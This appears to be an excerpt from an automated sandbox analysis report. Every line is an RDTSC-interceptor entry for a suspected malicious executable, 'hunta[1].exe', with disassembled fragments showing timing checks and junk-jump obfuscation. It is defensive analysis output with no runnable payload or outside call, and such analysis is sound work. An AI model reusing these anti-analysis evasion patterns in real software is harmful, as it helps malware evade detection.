            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126D6CE second address: 126D6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12719E9 second address: 12719F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF2E55A2C26h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12719F3 second address: 12719F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 592092B second address: 592092F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 592092F second address: 5920935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 58F00FD second address: 58F010C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 58F010C second address: 58F0176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF2E5514DEEh 0x0000000f push eax 0x00000010 jmp 00007FF2E5514DEBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FF2E5514DF6h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF2E5514DF7h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59608B2 second address: 59608B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 58E0BD2 second address: 58E0BD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 58E0BD8 second address: 58E0C14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E55A2C2Ch 0x00000009 and ax, 1228h 0x0000000e jmp 00007FF2E55A2C2Bh 0x00000013 popfd 0x00000014 mov si, EB1Fh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF2E55A2C31h 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 58E0C14 second address: 58E0C98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E5514DF7h 0x00000009 sbb si, 40CEh 0x0000000e jmp 00007FF2E5514DF9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FF2E5514DF0h 0x0000001a adc ax, 3948h 0x0000001f jmp 00007FF2E5514DEBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push eax 0x00000029 pushad 0x0000002a jmp 00007FF2E5514DEFh 0x0000002f mov ah, 3Fh 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FF2E5514DEEh 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 58E0C98 second address: 58E0C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 58E0C9E second address: 58E0CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 58E0CA2 second address: 58E0CD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF2E55A2C39h 0x0000000f push dword ptr [ebp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ax, di 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 58E0CD0 second address: 58E0CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 58E0CD5 second address: 58E0CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59309AA second address: 59309AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59309AE second address: 59309B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59309B2 second address: 59309B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59309B8 second address: 59309E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 34h 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, 3DFD71AFh 0x00000012 pushad 0x00000013 call 00007FF2E55A2C32h 0x00000018 pop eax 0x00000019 mov eax, edi 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59309E9 second address: 59309ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59309ED second address: 59309F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59309F1 second address: 59309F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59309F7 second address: 59309FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59309FD second address: 5930A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930A01 second address: 5930A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930A18 second address: 5930A35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5980379 second address: 598037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 598037F second address: 5980383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5980383 second address: 59803B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E55A2C34h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59803B3 second address: 59803B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59803B9 second address: 59803BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5960E03 second address: 5960E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5960E09 second address: 5960E0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 58F054D second address: 58F0553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 58F0553 second address: 58F0557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 58F0557 second address: 58F0583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF2E5514DEEh 0x00000012 pop ebp 0x00000013 pushad 0x00000014 push esi 0x00000015 mov dl, 1Ch 0x00000017 pop esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 596063D second address: 5960662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E55A2C2Dh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5960662 second address: 5960668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5960668 second address: 596066C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 596066C second address: 59606ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF2E5514DEFh 0x00000013 jmp 00007FF2E5514DF3h 0x00000018 popfd 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FF2E5514DF6h 0x00000020 xor esi, 3A0D51E8h 0x00000026 jmp 00007FF2E5514DEBh 0x0000002b popfd 0x0000002c mov ecx, 076D95DFh 0x00000031 popad 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF2E5514DECh 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59606ED second address: 59606F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59606F1 second address: 59606F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59606F7 second address: 596070C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 mov di, F68Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 596070C second address: 5960728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5960728 second address: 596073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Eh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5960C5C second address: 5960C79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5960C79 second address: 5960C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, 6CE9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5960C98 second address: 5960C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5960C9D second address: 5960CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF2E55A2C2Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, edx 0x00000016 push edx 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5960CCF second address: 5960CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5960CD4 second address: 5960D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF2E55A2C2Eh 0x0000000a xor si, 8348h 0x0000000f jmp 00007FF2E55A2C2Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebp+08h] 0x0000001b pushad 0x0000001c movzx esi, bx 0x0000001f mov edi, 5CC8DA24h 0x00000024 popad 0x00000025 and dword ptr [eax], 00000000h 0x00000028 jmp 00007FF2E55A2C33h 0x0000002d and dword ptr [eax+04h], 00000000h 0x00000031 pushad 0x00000032 pushad 0x00000033 push eax 0x00000034 pop edi 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 pushfd 0x00000039 jmp 00007FF2E55A2C2Ch 0x0000003e xor al, 00000008h 0x00000041 jmp 00007FF2E55A2C2Bh 0x00000046 popfd 0x00000047 popad 0x00000048 pop ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FF2E55A2C35h 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930929 second address: 593092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 593092D second address: 5930933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5960F85 second address: 5960F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59107F3 second address: 5910877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushfd 0x00000006 jmp 00007FF2E55A2C2Bh 0x0000000b sbb al, 0000004Eh 0x0000000e jmp 00007FF2E55A2C39h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push ebx 0x0000001b pop eax 0x0000001c pop edi 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov cx, dx 0x00000023 pushfd 0x00000024 jmp 00007FF2E55A2C33h 0x00000029 jmp 00007FF2E55A2C33h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 pushad 0x00000032 movzx ecx, dx 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 jmp 00007FF2E55A2C2Ah 0x0000003d pop ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 mov cx, di 0x00000044 mov dx, F0CCh 0x00000048 popad 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970E0A second address: 5970E2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, E484h 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FF2E5514DEFh 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970E2E second address: 5970E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970E32 second address: 5970E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970E38 second address: 5970EBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FF2E55A2C34h 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 jmp 00007FF2E55A2C2Eh 0x0000001c movzx esi, dx 0x0000001f popad 0x00000020 mov eax, dword ptr [777265FCh] 0x00000025 jmp 00007FF2E55A2C2Dh 0x0000002a test eax, eax 0x0000002c pushad 0x0000002d pushad 0x0000002e mov dh, ch 0x00000030 mov bl, 77h 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 pop ecx 0x00000036 pop edx 0x00000037 popad 0x00000038 je 00007FF3572D56F7h 0x0000003e pushad 0x0000003f pushad 0x00000040 movzx esi, bx 0x00000043 mov edi, 7D806BD2h 0x00000048 popad 0x00000049 push edi 0x0000004a movzx ecx, di 0x0000004d pop ebx 0x0000004e popad 0x0000004f mov ecx, eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FF2E55A2C2Dh 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970EBD second address: 5970F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007FF2E5514DF3h 0x0000000c and eax, 26EE5D2Eh 0x00000012 jmp 00007FF2E5514DF9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xor eax, dword ptr [ebp+08h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FF2E5514DF8h 0x00000027 jmp 00007FF2E5514DF5h 0x0000002c popfd 0x0000002d mov bh, cl 0x0000002f popad 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970F32 second address: 5970F6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007FF2E55A2C30h 0x00000011 ror eax, cl 0x00000013 jmp 00007FF2E55A2C30h 0x00000018 leave 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970F6C second address: 5970F72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59701E4 second address: 5970237 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF2E55A2C33h 0x00000015 sbb ecx, 2A981A3Eh 0x0000001b jmp 00007FF2E55A2C39h 0x00000020 popfd 0x00000021 movzx eax, dx 0x00000024 popad 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970237 second address: 5970275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov eax, 00CC3F9Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and dword ptr [eax], 00000000h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edx, si 0x00000017 pushfd 0x00000018 jmp 00007FF2E5514DF4h 0x0000001d sbb cx, F998h 0x00000022 jmp 00007FF2E5514DEBh 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970275 second address: 5970299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5970299 second address: 597029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 597029D second address: 59702B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 593001E second address: 5930024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930024 second address: 5930056 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 mov si, F9AFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FF2E55A2C32h 0x00000012 push eax 0x00000013 jmp 00007FF2E55A2C2Bh 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930056 second address: 5930071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930071 second address: 5930089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C34h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930089 second address: 593008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 593008D second address: 59300D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ebx, 18AD75AEh 0x00000011 push ebx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FF2E55A2C2Bh 0x0000001a and esi, 23B8A65Eh 0x00000020 jmp 00007FF2E55A2C39h 0x00000025 popfd 0x00000026 popad 0x00000027 and esp, FFFFFFF8h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59300D7 second address: 59300DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59300DB second address: 59300DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59300DF second address: 59300E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59300E5 second address: 5930129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E55A2C37h 0x00000009 sbb si, E11Eh 0x0000000e jmp 00007FF2E55A2C39h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930129 second address: 593012D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 593012D second address: 5930131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930131 second address: 5930137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 5930137 second address: 593013D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
